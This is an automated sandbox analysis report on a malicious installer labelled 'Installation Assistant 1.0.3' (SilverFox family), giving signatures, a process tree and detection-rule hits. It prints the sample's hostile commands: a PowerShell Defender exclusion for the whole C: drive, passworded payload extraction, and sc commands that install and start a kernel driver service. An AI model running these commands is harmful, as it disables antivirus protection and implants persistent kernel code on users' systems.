Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.3.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b1.0.3.exe (the #Uxxxx sequences are the sandbox's escaped form of the Unicode file name 安装助手1.0.3.exe, "Installation Assistant")
renamed because original name is a hash value
Original sample name: 1.0.3.exe
Analysis ID: 1580230
MD5: 3dd1a269e502f7284674c54819e9ad8e
SHA1: f3764c08583b70e6427d8efe97e6daa1582de9a3
SHA256: 9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: 3DD1A269E502F7284674C54819E9AD8E)
    • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 4388 cmdline: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: CC931C68EF6CB43932F2B21773072C73)
      • powershell.exe (PID: 3204 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5236 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 3392 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: 3DD1A269E502F7284674C54819E9AD8E)
        • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3856 cmdline: "C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: CC931C68EF6CB43932F2B21773072C73)
          • 7zr.exe (PID: 3908 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 5536 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 1340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5648 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5100 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5100 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3472 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6032 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 988 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5100 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5988 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7136 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5256 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2036 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4388 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6188 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3472 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6872 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6112 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2084 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5748 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4876 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 4388, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3204, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 5100, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 4388, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3204, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 5100, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 4388, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3204, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; Virustotal: Detection: 15%
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe; Virustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000E.00000003.2244717794.0000000001500000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000E.00000003.2244632805.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.14.dr
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C2DAEC0 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00976868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00977496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007EE4B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2126329450.0000000000821000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000000.2215420602.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr; String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007EE4B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2126329450.0000000000821000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000000.2215420602.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr; String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Process information set: 01 00 00 00
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C163886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C2E5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C163C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C163D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C2E5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C163D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C1639CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C163A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C161950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp; Code function: 8_2_6C164754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C164754
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C174A27
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C2E1880
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C2E6A43
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C346CE0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C396D10
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B4DE0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C318EA1
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39EEF0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C36AEEF
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C332EC9
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A6820
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C38E810
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B4870
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C364896
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3AC8D0
